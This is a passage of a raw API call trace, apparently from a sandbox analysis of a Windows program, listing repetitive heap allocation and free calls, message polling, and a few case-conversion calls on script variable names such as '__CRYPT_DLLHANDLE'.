RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0031.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0031.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0031.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c880 [0031.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0031.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0031.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0031.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0031.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0031.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x17922) returned 0x8bf210 [0031.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0031.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0031.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0031.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0031.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0031.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0031.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0031.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0031.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0031.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0031.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0031.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0031.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0031.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0031.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0031.835] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0031.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0031.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0031.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0031.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0031.835] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0031.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0031.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0031.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0031.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0031.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0031.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0031.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0031.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0031.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0031.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0031.835] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0031.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0031.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0031.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2b8 [0031.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0031.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0031.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0031.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0031.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cbc8 [0031.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0031.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0031.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0031.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0031.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0031.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0031.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0031.836] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0031.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0031.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0031.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0031.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0031.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0031.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0031.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0031.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0031.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0031.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0031.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0031.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0031.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0031.836] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0031.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0031.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0031.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0031.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0031.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0031.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0031.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0031.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0031.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0031.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0031.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0031.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0031.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0031.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0031.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0031.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0031.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0031.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0031.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0031.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0031.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0031.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0031.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0031.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0031.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.837] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0031.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0031.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0031.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0031.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0031.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0031.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0031.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0031.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0031.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0031.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0031.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0031.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0031.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0031.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0031.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0031.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0031.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0031.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0031.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0031.838] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0031.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0031.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0031.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0031.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0031.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0031.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0031.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0031.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0031.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0031.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0031.838] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0031.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb98 [0031.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0031.838] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0031.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0031.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0031.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0031.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0031.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0031.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0031.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0031.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0031.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0031.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0031.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0031.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0031.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0031.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0031.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0031.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0031.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0031.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0031.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0031.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0031.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0031.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0031.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0031.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0031.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0031.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0031.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0031.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0031.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0031.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0031.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0031.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0031.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0031.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0031.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0031.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0031.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0031.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0031.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0031.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0031.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0031.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0031.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0031.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0031.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0031.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0031.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0031.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0031.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0031.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0031.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0031.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0031.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0031.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0031.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0031.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0031.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0031.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0031.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0031.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0031.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0031.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0031.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0031.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0031.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0031.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0031.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0031.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0031.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0031.841] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0031.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0031.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0031.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0031.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0031.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0031.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0031.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0031.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0031.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) 